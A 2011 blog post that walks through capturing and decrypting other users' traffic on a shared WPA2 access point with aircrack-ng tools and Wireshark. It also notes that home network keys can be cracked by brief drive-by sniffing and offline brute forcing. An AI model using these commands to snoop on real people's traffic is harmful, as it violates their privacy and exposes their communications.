Wednesday 12 January 2011

WPA2 Packet Capture

Viewing packets for users on a secure wireless access point is stupidly easy.

If you sit anywhere that has a Free Access Point, you can capture traffic from other users. This may be a coffee shop or juice bar, or whatever. You may think that this can only be done on Open Access Points. You'd be wrong in this thinking. This is no secret. You can capture packets from other users even if encryption is turned on. That is, if WEP, WPA or even the strongest WPA2 encryption is being employed. Seriously, this isn't new.

In the case of the coffee shop the operators will give you the wireless key for free. In other places they may charge you a small fee for the usage of the Access Point. It doesn't really matter if they give you the key or not tbh. I say this because it is pretty simple to snaffle the key. You can do this by driving by a house and sniffing for traffic for as short a time as a few seconds, and running some brute forcing offline. Anyhoo, this is off topic.

How to do it.

Install Backtrack4. This takes 30 minutes. It's easier to have BT4 as the host OS to be able to have all the tools to hand and to have the right access to the wireless interface. After this step it is as simple as a few commands.

Show the adapter config

iwconfig


Create a new interface in monitor mode

airmon-ng start wlan0


Now, can scans for available networks

airodump-ng mon0


Capture traffic on the Access Point in question

airdump-ng -c CHANNEL --bssid MAC_ADDRESS -w demo_capture mon0


Decrypt the captured packets.

airdecap-ng -e SSID_NAME -p PASSWORD_KEY demo_capture-01.cap


Open the decrypted packet capture in wireshark and follow any of the TCP streams that look interesting. You'll be surprised what you can find out.